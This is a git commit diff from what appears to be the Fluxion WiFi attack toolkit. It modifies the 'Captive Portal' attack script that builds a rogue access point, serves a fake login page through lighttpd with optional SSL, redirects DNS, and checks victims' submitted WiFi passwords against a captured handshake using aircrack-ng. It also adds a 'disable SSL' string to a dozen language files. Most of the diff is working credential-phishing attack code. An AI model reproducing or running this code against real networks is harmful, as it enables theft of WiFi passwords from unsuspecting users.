Added optional SSL & reworote back option.

The user now has control of whether or not to enable lighttpd's SSL. The go-back option has been rewritten for readability & simplicity. Minor improvements to extensibilty for future authenticators (only has 1).
2017-12-05 21:22:06 -06:00 · 2017-12-05 21:22:06 -06:00 · d6e35fef00
parent 2004fc1c87
commit d6e35fef00
13 changed files with 128 additions and 111 deletions
--- a/Portal/attack.sh
+++ b/Portal/attack.sh
@ -15,6 +15,33 @@ CaptivePortalAuthenticationMethodsInfo=("(handshake file, ${CGrn}recommended$CCl
 VIGWAddress="192.168.254.1"
 VIGWNetwork=${VIGWAddress%.*}

+function captive_portal_run_interface() {
+	if [ ! "$1" ]; then return 1; fi
+
+	# Create an identifier for the access point, AP virtual interface.
+	local wiAccessPoint="FX${1:2}AP"
+
+	# Find interface's physical device.
+	if ! interface_physical "$1"
+		then echo -e "$FLUXIONVLine $FLUXIONPhysicalWIDeviceUnknownError"; sleep 5; return 1
+	fi
+
+	local wiAccessPointDevice="$InterfacePhysical"
+
+	# Create the new virtual interface with the generated identifier.
+	echo -e "$FLUXIONVLine $CaptivePortalStartingInterfaceNotice"
+	if ! iw phy $wiAccessPointDevice interface add $wiAccessPoint type monitor 2> $FLUXIONOutputDevice; then
+		echo -e "$FLUXIONVLine $CaptivePortalCannotStartInterfaceError"
+		sleep 5
+		return 3
+	fi
+
+	echo -e "$FLUXIONVLine $CaptivePortalStartedInterfaceNotice"
+	sleep 3
+
+	CaptivePortalRunInterface="$wiAccessPoint"
+}
+
 function captive_portal_unset_interface() {
 	if [ ! "$WIAccessPoint" ]; then return 1; fi

@ -50,8 +77,7 @@ function captive_portal_set_interface() {
 	ifAlternate[@] ifAlternateInfo[@] ifAlternateState[@] ifAlternateColor[@]

 	case "$InterfacePromptIfSelected" in
-		"$FLUXIONGeneralBackOption")
-			captive_portal_unset_interface; fluxion_unset_attack; return 1;;
+		"$FLUXIONGeneralBackOption") captive_portal_unset_interface; return 1;;

 		# If the monitor interface is also the AP interface,
 		# there's no need to reserve it again, just add it.
@ -87,45 +113,18 @@ function captive_portal_set_interface() {
 	fi
 }

-function captive_portal_run_interface() {
-	if [ ! "$1" ]; then return 1; fi
-
-	# Create an identifier for the access point, AP virtual interface.
-	local wiAccessPoint="FX${1:2}AP"
-
-	# Find interface's physical device.
-	if ! interface_physical "$1"
-		then echo -e "$FLUXIONVLine $FLUXIONPhysicalWIDeviceUnknownError"; sleep 5; return 1
-	fi
-
-	local wiAccessPointDevice="$InterfacePhysical"
-
-	# Create the new virtual interface with the generated identifier.
-	echo -e "$FLUXIONVLine $CaptivePortalStartingInterfaceNotice"
-	if ! iw phy $wiAccessPointDevice interface add $wiAccessPoint type monitor 2> $FLUXIONOutputDevice; then
-		echo -e "$FLUXIONVLine $CaptivePortalCannotStartInterfaceError"
-		sleep 5
-		return 3
-	fi
-
-	echo -e "$FLUXIONVLine $CaptivePortalStartedInterfaceNotice"
-	sleep 3
-
-	CaptivePortalRunInterface="$wiAccessPoint"
-}
-
 function captive_portal_unset_auth() {
 	if [ ! "$APRogueAuthMode" ]; then return 0; fi

-	if [ "$APRogueAuthMode" = "hash" ]; then
-		fluxion_unset_hash
-	fi
+	case "$APRogueAuthMode" in
+		"hash") fluxion_unset_hash;;
+	esac

 	APRogueAuthMode=""

-	# If we've only got one option, then the user skipped this
-	# section by taking that one option, so we unset the previous
-	# phase along with this one to take the user properly back.
+	# If we've only got one option, then the user skipped this section
+	# by auto-selecting that single option, so we unset the previous
+	# phase along with this one to properly take the user back.
 	if [ ${#CaptivePortalAuthenticationMethods[@]} -le 1 ]; then
 		captive_portal_unset_interface
 	fi
@ -134,14 +133,16 @@ function captive_portal_unset_auth() {
 function captive_portal_set_auth() {
 	if [ "$APRogueAuthMode" ]; then
 		echo "Captive Portal authentication mode is already set, skipping!" > $FLUXIONOutputDevice
-		return 0;
+		return 0
 	fi

 	captive_portal_unset_auth

+	# If we've got only one choice, auto-select it for the user.
 	if [ ${#CaptivePortalAuthenticationMethods[@]} -eq 1 -o \
 		 ${#CaptivePortalAuthenticationMethods[@]} -ge 1 -a "$FLUXIONAuto" ]; then
 		APRogueAuthMode="${CaptivePortalAuthenticationMethods[0]}"
+		echo "Auto-selected authentication method: $APRogueAuthMode" > $FLUXIONOutputDevice
 	else
 		fluxion_header

@ -158,17 +159,22 @@ function captive_portal_set_auth() {

 		APRogueAuthMode="${IOQueryFormatFields[0]}"

-		if [[ "$APRogueAuthMode" = "$FLUXIONGeneralBackOption" ]]; then
-			captive_portal_unset_auth
-			return 1
+		# If we're going back, reset everything and abort.
+		if [[ "$APRogueAuthMode" = "$FLUXIONGeneralBackOption" ]]
+			then captive_portal_unset_auth; return 1
 		fi
 	fi

-	if [ "$APRogueAuthMode" = "hash" ]; then
-		fluxion_set_hash
-	fi
+	# Process the authentication method selected.
+	captive_portal_set_auth_processingResult=1 # Assume failure.
+	case "$APRogueAuthMode" in
+		"hash") fluxion_set_hash; captive_portal_set_auth_processingResult=$?;;
+	esac

-	if [[ $? -ne 0 ]]; then captive_portal_unset_auth; return 1; fi
+	# Assure authentication method processing was successful, abort otherwise.
+	if [[ $captive_portal_set_auth_processingResult -ne 0 ]]
+		then captive_portal_unset_auth; return 1;
+	fi
 }

 function captive_portal_run_certificate_generator() {
@ -178,45 +184,61 @@ function captive_portal_run_certificate_generator() {

 function captive_portal_unset_cert() {
 	sandbox_remove_workfile "$FLUXIONWorkspacePath/server.pem"
+	CaptivePortalSSL=""
 }

 # Create Self-Signed SSL Certificate
 function captive_portal_set_cert() {
-	# Check existance of ssl certificate with file size > 0
-	if [ -f "$FLUXIONPath/attacks/Captive Portal/certificate/server.pem" -a \
-		 -s "$FLUXIONPath/attacks/Captive Portal/certificate/server.pem" ]; then
-		cp "$FLUXIONPath/attacks/Captive Portal/certificate/server.pem" \
-		   "$FLUXIONWorkspacePath/server.pem"
-	fi
-
-	# Check existance of ssl certificate with file size > 0
-	if [ -f "$FLUXIONWorkspacePath/server.pem" -a -s "$FLUXIONWorkspacePath/server.pem" ]; then
-		echo "Captive Portal certificate is already set, skipping!" > $FLUXIONOutputDevice
-		return 0;
+	if [ "$CaptivePortalSSL" ]; then
+		echo "Captive Portal SSL mode already set to $CaptivePortalSSL!" > $FLUXIONOutputDevice
+		return 0
 	fi

 	captive_portal_unset_cert

+	# Check for existance of ssl certificate within fluxion with file size > 0
+	# If a certificate exists, it's user supplied (fancy), copy it to fluxspace.
+	if [ -f "$FLUXIONPath/attacks/Captive Portal/certificate/server.pem" -a \
+		 -s "$FLUXIONPath/attacks/Captive Portal/certificate/server.pem" ]; then
+		cp "$FLUXIONPath/attacks/Captive Portal/certificate/server.pem" \
+		   "$FLUXIONWorkspacePath/server.pem"
+
+		CaptivePortalSSL="enabled" # Must be enabled if sourcing own certificate
+
+		echo "Captive Portal certificate was user supplied, skipping query!" > $FLUXIONOutputDevice
+		return 0;
+	fi
+
 	if [ "$FLUXIONAuto" ]; then
-		captive_portal_run_certificate_generator
+		# If cert generator fails, gtfo, something broke!
+		if ! captive_portal_run_certificate_generator
+			then fluxion_conditional_bail "cert-gen failed!"; return 2
+		fi
+		CaptivePortalSSL="enabled"
 	else
-		local choices=("$CaptivePortalCertificateSourceGenerateOption" "$CaptivePortalCertificateSourceRescanOption" "$FLUXIONGeneralBackOption")
+		local choices=("$CaptivePortalCertificateSourceGenerateOption" "$CaptivePortalCertificateSourceRescanOption" "$CaptivePortalCertificateSourceDisabledOption" "$FLUXIONGeneralBackOption")

-		while [ ! -f "$FLUXIONWorkspacePath/server.pem" -o ! -s "$FLUXIONWorkspacePath/server.pem" ]; do
-			io_query_choice "$CaptivePortalCertificateSourceQuery" choices[@]
+		io_query_choice "$CaptivePortalCertificateSourceQuery" choices[@]

-			echo
+		echo

-			case "$IOQueryChoice" in
-				"$CaptivePortalCertificateSourceGenerateOption") captive_portal_run_certificate_generator; break;;
-				"$CaptivePortalCertificateSourceRescanOption") return 2;;
-				"$FLUXIONGeneralBackOption")
-					captive_portal_unset_auth
-					captive_portal_unset_cert
-					return 1;;
-				*) conditional_bail; return 3;;
-			esac
-		done
+		case "$IOQueryChoice" in
+			"$CaptivePortalCertificateSourceGenerateOption")
+				# If cert generator fails, gtfo, something broke!
+				if ! captive_portal_run_certificate_generator
+					then fluxion_conditional_bail "cert-gen failed!"; return 2
+				fi
+				CaptivePortalSSL="enabled";;
+
+			"$CaptivePortalCertificateSourceRescanOption")
+				captive_portal_set_cert; return $?;;
+
+			"$CaptivePortalCertificateSourceDisabledOption")
+				captive_portal_unset_cert; CaptivePortalSSL="disabled";;
+
+			"$FLUXIONGeneralBackOption") captive_portal_unset_cert; return 1;;
+			*) fluxion_conditional_bail "Unknown cert-gen option!"; return 2;;
+		esac
 	fi
 }

@ -280,7 +302,6 @@ function captive_portal_set_site() {
 			source "$FLUXIONPath/attacks/Captive Portal/generic/languages/$siteLanguage.lang"
 			captive_portal_generic;;
 		"$FLUXIONGeneralBackOption")
-			captive_portal_unset_cert
 			captive_portal_unset_site
 			return 1;;
 		* )
@ -403,12 +424,19 @@ index-file.names = (
 	\"index.html\",
    \"index.php\"
 )
+" > "$FLUXIONWorkspacePath/lighttpd.conf"

-#\$SERVER[\"socket\"] == \":443\" {
-#	ssl.engine = \"enable\"
-#	ssl.pemfile = \"$FLUXIONWorkspacePath/server.pem\"
-#}
+	# Configure lighttpd's SSL only if we've got a certificate and its key.
+	if [ -f "$FLUXIONWorkspacePath/server.pem" -a -s "$FLUXIONWorkspacePath/server.pem" ]; then
+		echo "\
+\$SERVER[\"socket\"] == \":443\" {
+	ssl.engine = \"enable\"
+	ssl.pemfile = \"$FLUXIONWorkspacePath/server.pem\"
+}
+" >> "$FLUXIONWorkspacePath/lighttpd.conf"
+	fi

+	echo "\
 # Redirect www.domain.com to domain.com
 #\$HTTP[\"host\"] =~ \"^www\.(.*)$\" {
 #	url.redirect = ( \"^/(.*)\" => \"http://%1/\$1\" )
@ -447,7 +475,7 @@ index-file.names = (
 	server.document-root = \"$FLUXIONWorkspacePath/captive_portal/connectivity_responses/Google/\"
 	url.rewrite-once = ( \"^/generate_204\$\" => \"generate_204.php\" )
 }
-" > "$FLUXIONWorkspacePath/lighttpd.conf"
+" >> "$FLUXIONWorkspacePath/lighttpd.conf"


 	# Create a DNS service with python, forwarding all traffic to gateway.
@ -585,25 +613,6 @@ while [ \$AuthenticatorState = \"running\" ]; do
 			echo \"1\" > \"$FLUXIONWorkspacePath/candidate_result.txt\"
 		fi
 	fi" >> "$FLUXIONWorkspacePath/captive_portal_authenticator.sh"
-
-	elif [ $APRogueAuthMode = "wpa_supplicant" ]; then
-		echo "
-	wpa_passphrase \"$APTargetSSID\" \"\`cat \"$FLUXIONWorkspacePath/candidate.txt\"\`\" > \"$FLUXIONWorkspacePath/wpa_supplicant.conf\"
-	wpa_supplicant -i \"$WIAccessPoint\" -c \"$FLUXIONWorkspacePath/wpa_supplicant.conf\" -f \"$FLUXIONWorkspacePath/wpa_supplicant.log\" &
-	wpaSupplicantPID=\$!
-
-	# Shitty design...
-	sleep 5
-
-	if [ -f \"$FLUXIONWorkspacePath/candidate_result.txt\" ]; then
-		if grep -i 'WPA: Key negotiation completed' \"$FLUXIONWorkspacePath/wpa_supplicant.log\"; then
-			echo \"2\" > \"$FLUXIONWorkspacePath/candidate_result.txt\"
-			break
-		else
-			echo \"1\" > \"$FLUXIONWorkspacePath/candidate_result.txt\"
-		fi
-	fi" >> "$FLUXIONWorkspacePath/captive_portal_authenticator.sh"
-
 	fi

 	echo "
@ -649,12 +658,6 @@ while [ \$AuthenticatorState = \"running\" ]; do
 	if [ $APRogueAuthMode = "hash" ]; then
 		echo "
 	sleep 1" >> "$FLUXIONWorkspacePath/captive_portal_authenticator.sh"
-
-	elif [ $APRogueAuthMode = "wpa_supplicant" ]; then
-		echo "
-	killall \$wpaSupplicantPID &> $FLUXIONOutputDevice
-" >> "$FLUXIONWorkspacePath/captive_portal_authenticator.sh"
-
 	fi

 	echo "
@ -706,12 +709,6 @@ Password: \$(cat $FLUXIONWorkspacePath/candidate.txt)
 		echo "
 aircrack-ng -a 2 -b $APTargetMAC -0 -s \"$FLUXIONWorkspacePath/$APTargetSSIDClean-$APTargetMAC.cap\" -w \"$FLUXIONWorkspacePath/candidate.txt\" && echo && echo -e \"The password was saved in "$CRed"$CaptivePortalNetLog/$APTargetSSID-$APTargetMAC.log"$CClr"\"\
 " >> "$FLUXIONWorkspacePath/captive_portal_authenticator.sh"
-
-	elif [ $APRogueAuthMode = "wpa_supplicant" ]; then
-		echo "
-echo -e \"The password was saved in "$CRed"$CaptivePortalNetLog/$APTargetSSID-$APTargetMAC.log"$CClr"\"\
-" >> "$FLUXIONWorkspacePath/captive_portal_authenticator.sh"
-
 	fi

 	chmod +x "$FLUXIONWorkspacePath/captive_portal_authenticator.sh"
@ -940,11 +937,19 @@ function unprep_attack() {

 function prep_attack() {
 	while true; do
-		captive_portal_set_interface; 	if [ $? -ne 0 ]; then break; fi
-		captive_portal_set_auth; 		if [ $? -ne 0 ]; then continue; fi
-		captive_portal_set_cert; 		if [ $? -ne 0 ]; then continue; fi
-		captive_portal_set_site; 		if [ $? -ne 0 ]; then continue; fi
-		captive_portal_set_attack; 		if [ $? -ne 0 ]; then continue; fi
+		captive_portal_set_interface; if [ $? -ne 0 ]; then break; fi
+		captive_portal_set_auth; if [ $? -ne 0 ]; then
+			captive_portal_unset_interface; continue
+		fi
+		captive_portal_set_cert; if [ $? -ne 0 ]; then
+			captive_portal_unset_auth; continue
+		fi
+		captive_portal_set_site; if [ $? -ne 0 ]; then
+			captive_portal_unset_cert; continue
+		fi
+		captive_portal_set_attack; if [ $? -ne 0 ]; then
+			captive_portal_unset_site; continue
+		fi
 		CaptivePortalState="Ready"
 		break
 	done
--- a/Portal/language/cs.sh
+++ b/Portal/language/cs.sh
@ -20,6 +20,7 @@ CaptivePortalVerificationMethodQuery="METHODA ZÍSKÁNÍ HESLA"
 CaptivePortalCertificateSourceQuery="Select SSL certificate source for captive portal"
 CaptivePortalCertificateSourceGenerateOption="Create an SSL certificate"
 CaptivePortalCertificateSourceRescanOption="Detect SSL certificate (${CClr}search again$CGry)"
+CaptivePortalCertificateSourceDisabledOption="None (${CYel}disable SSL$CGry)"
 CaptivePortalUIQuery="Select a captive portal interface for the rogue network"
 CaptivePortalGenericInterfaceOption="Generic Portal"
 # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
--- a/Portal/language/de.sh
+++ b/Portal/language/de.sh
@ -20,6 +20,7 @@ CaptivePortalVerificationMethodQuery="Methode zum Prüfen des Handshake"
 CaptivePortalCertificateSourceQuery="Select SSL certificate source for captive portal"
 CaptivePortalCertificateSourceGenerateOption="Create an SSL certificate"
 CaptivePortalCertificateSourceRescanOption="Detect SSL certificate (${CClr}search again$CGry)"
+CaptivePortalCertificateSourceDisabledOption="None (${CYel}disable SSL$CGry)"
 CaptivePortalUIQuery="Select a captive portal interface for the rogue network"
 CaptivePortalGenericInterfaceOption="Generic Portal"
 # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
--- a/Portal/language/el.sh
+++ b/Portal/language/el.sh
@ -20,6 +20,7 @@ CaptivePortalVerificationMethodQuery="Μέθοδος επαλήθευσης κω
 CaptivePortalCertificateSourceQuery="Select SSL certificate source for captive portal"
 CaptivePortalCertificateSourceGenerateOption="Create an SSL certificate"
 CaptivePortalCertificateSourceRescanOption="Detect SSL certificate (${CClr}search again$CGry)"
+CaptivePortalCertificateSourceDisabledOption="None (${CYel}disable SSL$CGry)"
 CaptivePortalUIQuery="Select a captive portal interface for the rogue network"
 CaptivePortalGenericInterfaceOption="Generic Portal"
 # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
--- a/Portal/language/en.sh
+++ b/Portal/language/en.sh
@ -20,6 +20,7 @@ CaptivePortalVerificationMethodQuery="Select a password verification method"
 CaptivePortalCertificateSourceQuery="Select SSL certificate source for captive portal"
 CaptivePortalCertificateSourceGenerateOption="Create an SSL certificate"
 CaptivePortalCertificateSourceRescanOption="Detect SSL certificate (${CClr}search again$CGry)"
+CaptivePortalCertificateSourceDisabledOption="None (${CYel}disable SSL$CGry)"
 CaptivePortalUIQuery="Select a captive portal interface for the rogue network"
 CaptivePortalGenericInterfaceOption="Generic Portal"
 # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
--- a/Portal/language/es.sh
+++ b/Portal/language/es.sh
@ -20,6 +20,7 @@ CaptivePortalVerificationMethodQuery="MÉTODO PARA VERIFICAR CONTRASEÑA"
 CaptivePortalCertificateSourceQuery="Select SSL certificate source for captive portal"
 CaptivePortalCertificateSourceGenerateOption="Create an SSL certificate"
 CaptivePortalCertificateSourceRescanOption="Detect SSL certificate (${CClr}search again$CGry)"
+CaptivePortalCertificateSourceDisabledOption="None (${CYel}disable SSL$CGry)"
 CaptivePortalUIQuery="Select a captive portal interface for the rogue network"
 CaptivePortalGenericInterfaceOption="Generic Portal"
 # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
--- a/Portal/language/fr.sh
+++ b/Portal/language/fr.sh
@ -20,6 +20,7 @@ CaptivePortalVerificationMethodQuery="METHODE DE VÉRIFICATION DU MOT DE PASSE"
 CaptivePortalCertificateSourceQuery="Sélectionnez le certificat SSL source pour le portail captif"
 CaptivePortalCertificateSourceGenerateOption="Créer un certificat SSL"
 CaptivePortalCertificateSourceRescanOption="Détecter le certificat SSL (${CClr}chercher encore$CGry)"
+CaptivePortalCertificateSourceDisabledOption="None (${CYel}disable SSL$CGry)"
 CaptivePortalUIQuery="Sélectionnez une interface de portail captif pour le réseau parasite"
 CaptivePortalGenericInterfaceOption="Portail générique"
 # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
--- a/Portal/language/it.sh
+++ b/Portal/language/it.sh
@ -20,6 +20,7 @@ CaptivePortalVerificationMethodQuery="MODALITA' DI VERIFICA DELLA PASSWORD"
 CaptivePortalCertificateSourceQuery="Seleziona il certificato SSL"
 CaptivePortalCertificateSourceGenerateOption="Crea il certificato SSL"
 CaptivePortalCertificateSourceRescanOption="Identifica il certificato SSL (${CClr}cerca ancora$CGry)"
+CaptivePortalCertificateSourceDisabledOption="None (${CYel}disable SSL$CGry)"
 CaptivePortalUIQuery="Seleziona l'intefaccia del Portale di Cattura"
 CaptivePortalGenericInterfaceOption="Portale Generico"
 # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
--- a/Portal/language/ro.sh
+++ b/Portal/language/ro.sh
@ -20,6 +20,7 @@ CaptivePortalVerificationMethodQuery="METODA PENTRU VERIFICAREA PAROLEI"
 CaptivePortalCertificateSourceQuery="Select SSL certificate source for captive portal"
 CaptivePortalCertificateSourceGenerateOption="Create an SSL certificate"
 CaptivePortalCertificateSourceRescanOption="Detect SSL certificate (${CClr}search again$CGry)"
+CaptivePortalCertificateSourceDisabledOption="None (${CYel}disable SSL$CGry)"
 CaptivePortalUIQuery="Select a captive portal interface for the rogue network"
 CaptivePortalGenericInterfaceOption="Generic Portal"
 # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
--- a/Portal/language/sk.sh
+++ b/Portal/language/sk.sh
@ -20,6 +20,7 @@ CaptivePortalVerificationMethodQuery="Vyberte spôsob overenia hesla"
 CaptivePortalCertificateSourceQuery="Vyberte SSL certifikát pre 'Captive Portal'"
 CaptivePortalCertificateSourceGenerateOption="Vytvoriť SSL certifikát"
 CaptivePortalCertificateSourceRescanOption="Detekovať SSL certifikát (${CClr}hľadať znovu$CGry)"
+CaptivePortalCertificateSourceDisabledOption="None (${CYel}disable SSL$CGry)"
 CaptivePortalUIQuery="Vyberte 'Captive Portal' adaptér pre falošnú sieť (rogue network)"
 CaptivePortalGenericInterfaceOption="Všeobecný Portál (generic portal)"
 # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
--- a/Portal/language/sl.sh
+++ b/Portal/language/sl.sh
@ -20,6 +20,7 @@ CaptivePortalVerificationMethodQuery="METODA PREVERITVE GESLA"
 CaptivePortalCertificateSourceQuery="Select SSL certificate source for captive portal"
 CaptivePortalCertificateSourceGenerateOption="Create an SSL certificate"
 CaptivePortalCertificateSourceRescanOption="Detect SSL certificate (${CClr}search again$CGry)"
+CaptivePortalCertificateSourceDisabledOption="None (${CYel}disable SSL$CGry)"
 CaptivePortalUIQuery="Select a captive portal interface for the rogue network"
 CaptivePortalGenericInterfaceOption="Generic Portal"
 # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
--- a/Portal/language/tk.sh
+++ b/Portal/language/tk.sh
@ -20,6 +20,7 @@ CaptivePortalVerificationMethodQuery="Sifre dogrulama methodu seciniz"
 CaptivePortalCertificateSourceQuery="Esaret Portali icin SSL sertifika kaynagi seciniz"
 CaptivePortalCertificateSourceGenerateOption="SSL sertifikasi olustur"
 CaptivePortalCertificateSourceRescanOption="SSL sertifikasi belirle (${CClr}tekrar ara$CGry)"
+CaptivePortalCertificateSourceDisabledOption="None (${CYel}disable SSL$CGry)"
 CaptivePortalUIQuery="Duzenbaz ag icin Esaret Portali arayuzu seciniz"
 CaptivePortalGenericInterfaceOption="Generic Portal"
 # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
--- a/Portal/language/zh.sh
+++ b/Portal/language/zh.sh
@ -20,6 +20,7 @@ CaptivePortalVerificationMethodQuery="请选择验证密码方式"
 CaptivePortalCertificateSourceQuery="选择钓鱼认证门户的SSL证书来源"
 CaptivePortalCertificateSourceGenerateOption="创建SSL证书"
 CaptivePortalCertificateSourceRescanOption="检测SSL证书 (${CClr}再次搜索$CGry)"
+CaptivePortalCertificateSourceDisabledOption="None (${CYel}disable SSL$CGry)"
 CaptivePortalUIQuery="选择钓鱼热点的认证网页界面"
 CaptivePortalGenericInterfaceOption="通用认证网页"
 # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>